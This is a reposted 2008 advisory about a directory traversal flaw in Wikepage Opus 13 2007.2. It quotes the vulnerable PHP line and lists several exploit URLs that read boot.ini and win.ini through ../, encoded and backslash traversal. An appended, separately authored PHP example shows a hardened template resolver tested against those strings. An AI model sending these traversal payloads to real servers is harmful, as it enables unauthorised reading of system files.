Computer Security
[EN] securityvulns.ru

From: virangar_nml_(at)_yahoo.com <virangar_nml_(at)_yahoo.com>
Date: 08.04.2008
Subject: Wikepage Opus 13 2007.2 Directory Traversal Vulnerability

##############################################################################
#                                                                            #
#  ...:::::Wikepage Opus 13 2007.2 Directory Traversal Vulnerability ::::.... #
##############################################################################

## AUTHOR : Virangar Security Team (A.Nosrati)
## Email  : Virangar_nml@yahoo.com or 9120000000@yahoo.com or Virangar_SECRET@hotmail.com
## ICQ    : 445117030
## Script : Wikepage Opus 13 2007.2
## Type Of Bug : Directory Traversal

Virangar Security Team
VIRANGAR UNDER GR0UND TEAM

Special tnx to:HadiHadi,black.shadowes,MR.hesy,IGI,Night_Fox,Kasra515,Gholonbeh_MS

& all Virangar Members .........................

Greetz:Ali007;Kouros_Virus2005 ........
-----------------------------------
Web Site : http://www.wikepage.org/
(Download: http://sourceforge.net/project/downloading.php?groupname=wikepage&filename=wikepage2007_2.zip&use_mirror=puzzle)

-----------------------------------
Vulnerability path:

Vulnerable code in [localhost]/wikepage/index.php
Sample of vulnerable line: $templatefile=$_GET['template'];  (Line 586) and more .....


Exploit:
http://localhost/wikepage/index.php?wiki=template=../../../../../../../../boot.ini
or
http://localhost/wikepage/index.php?wiki=Admin=../../../../../../../../boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=../../../../../../../../boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c/boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=..\..\..\..\..\..\..\..\WINDOWS\win.ini
and more ........


Good Luck
Virangar.org ( Coming Soooooooooooooooooooooon::::::::::::::::::)
Are U Ready hummmmmmmmmmmm???!!!!!!!!!!
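
A hardened counterpart to the `$templatefile=$_GET['template'];` line quoted in the advisory, as an added example (not Wikepage's code and not the advisory author's). The function name `resolve_template()`, the `templates` directory and the `.html` extension are assumptions; the sample inputs are constructed from the traversal patterns listed above.

```php
<?php
// Added example. TEMPLATE_DIR and resolve_template() are hypothetical names.
const TEMPLATE_DIR = __DIR__ . '/templates';   // assumed template location

/**
 * Map a user-supplied template name to a file inside $baseDir.
 * Returns the canonical path, or null if the name is not acceptable.
 */
function resolve_template(string $name, string $baseDir = TEMPLATE_DIR): ?string
{
    // PHP has already URL-decoded $_GET, so %2e%2e%5c arrives as "..\".
    // Allow only a plain name: no dots, slashes, backslashes or NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Canonicalise, then confirm the result is still under the base directory.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.html');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Self-contained demo with constructed inputs (run with: php example.php).
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'default.html', '<html></html>');

$samples = [
    'default',                                  // legitimate template name
    '../../../../../../../../boot.ini',         // pattern from the advisory
    '..\\..\\..\\..\\WINDOWS\\win.ini',         // backslash variant
    "default\0.ini",                            // NUL-byte truncation attempt
    'missing',                                  // valid name, no such file
];
foreach ($samples as $s) {
    $result = resolve_template($s, $dir);
    printf("%-45s => %s\n", json_encode($s), $result === null ? 'rejected' : 'accepted');
}

unlink($dir . DIRECTORY_SEPARATOR . 'default.html');
rmdir($dir);
```

Only the first sample is accepted; the name allowlist stops the traversal strings before any filesystem call, and the `realpath()` prefix check is a second barrier in case the allowlist is later loosened.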

© SecurityVulns, 3APA3A, Vladimir Dubrovin